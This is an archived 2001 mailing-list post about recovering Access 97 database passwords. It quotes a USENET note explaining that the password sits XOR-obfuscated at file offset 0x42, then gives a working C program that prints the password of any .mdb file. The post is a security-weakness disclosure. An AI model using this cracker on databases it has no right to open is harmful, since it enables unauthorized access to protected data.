> The following text was posted to USENET, and indexed on a Russian cypherpunk
> site. I found it when I was doing some work with Access 97 databses. I
> think you will agree that this particular "feature" makes the linked
> database password issue moot.
Most definately!
> > Anyway, Access97 passwords are stored in the 13 bytes from offset
> >0x42 in a .mdb file. Do a bitwise XOR with 0x86, 0xFB, 0xEC, 0x37,
> >0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 to recover the
> >plaintext. I think that if the first byte is 0x86, the password is
> >not checked.
Minor correction: the passwords can be a maximum of 14 bytes. The last
XOR value is 0xD8. Here's a quick program to test this lack of
security:
/* snip here */
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
FILE *mdb; int i; char ch;
int secret[14]={
0x86,0xFB,0xEC,0x37,
0x5D,0x44,0x9C,0xFA,
0xC6,0x5E,0x28,0xE6,
0x13,0xD8
};
if(argc<2) {
fprintf(stderr,"usage: %s filename.mdb\n",argv[0]);
return 1;
}
if((mdb=fopen(argv[1],"rb"))==NULL) {
fprintf(stderr,"%s: can't open %s\n",argv[0],argv[1]);
return 1;
}
fseek(mdb,0x42,SEEK_SET);
printf("The password is: ");
for(i=0;i<14;i++)
{
if((ch=fgetc(mdb)^secret[i])==0) break;
putchar(ch);
}
if(i==0) printf("(none)");
putchar('\n');
fclose(mdb);
return 0;
}
/* snip here */
-jim
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:33:22 PDT